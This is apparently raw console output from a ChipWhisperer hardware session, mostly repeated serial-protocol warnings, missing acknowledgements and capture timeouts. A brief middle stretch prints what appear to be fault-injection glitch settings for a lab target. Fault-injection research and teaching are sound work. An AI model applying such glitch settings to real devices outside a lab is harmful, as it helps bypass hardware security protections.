(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
Trigger still high!
CWbytearray(b'01') 46.09375 -47.65625 54 🐙CWbytearray(b'01') 46.09375 -47.65625 54 🐙
CWbytearray(b'01') 46.09375 -47.65625 54 🐙CWbytearray(b'01') 46.09375 -47.65625 54 🐙
CWbytearray(b'01') 46.09375 -47.65625 54 🐙CWbytearray(b'01') 46.09375 -47.65625 54 🐙
CWbytearray(b'01') 46.09375 -47.65625 54 🐙CWbytearray(b'01') 46.09375 -47.65625 54 🐙
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
CWbytearray(b'01') 46.09375 -47.65625 54 🐙CWbytearray(b'01') 46.09375 -47.65625 54 🐙
CWbytearray(b'01') 46.09375 -47.65625 55 🐙
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 1
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0b
(ChipWhisperer Scope WARNING|File _OpenADCInterface.py:732) Timeout in OpenADC capture(), no trigger seen! Trigger forced, data is invalid. Status: 0a
Timeout - no trigger
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:377) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:410) Unexpected length 69, 1
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 6
(ChipWhisperer Target ERROR|File SimpleSerial2.py:288) Device reported error 0x3
(ChipWhisperer Target ERROR|File SimpleSerial2.py:290) CWbytearray(b'00 06 06 03 72 01 00 06 06 86 00')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
(ChipWhisperer Target ERROR|File SimpleSerial2.py:285) Device did not ack
(ChipWhisperer Target WARNING|File SimpleSerial2.py:514) Unexpected start to command 82
(ChipWhisperer Target WARNING|File SimpleSerial2.py:528) Didn't get all data 7, 71
(ChipWhisperer Target WARNING|File SimpleSerial2.py:529) CWbytearray(b'53 45 54 20 20 20 0a')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:530) CWbytearray(b'00 52 45')
(ChipWhisperer Target WARNING|File SimpleSerial2.py:543) Unexpected length 69, 5
